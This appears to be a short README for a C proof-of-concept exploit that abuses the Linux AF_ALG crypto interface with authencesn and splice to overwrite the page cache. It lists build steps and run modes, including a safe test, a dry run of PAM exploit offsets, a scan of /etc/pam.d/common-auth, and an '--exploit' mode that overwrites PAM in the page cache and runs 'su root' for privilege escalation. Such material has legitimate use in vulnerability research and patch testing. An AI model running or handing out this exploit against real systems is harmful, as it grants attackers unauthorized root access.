made by c0redev (https://unitdev.run)
C PoC for AF_ALG + authencesn + splice page-cache overwrite.
Build:
make
make staticRun test:
./authencesn-poc --safeRun algorithm matrix:
./authencesn-poc --matrixShow PAM exploit offsets without triggering:
./authencesn-poc --exploit --dry-runTrigger PAM page-cache overwrite and run su root:
./authencesn-poc --exploitScan duplicate 4-byte sequences in a target file:
./authencesn-poc --check /etc/pam.d/common-authExpected vulnerable safe output:
[+] VULNERABLE: page-cache overwrite confirmed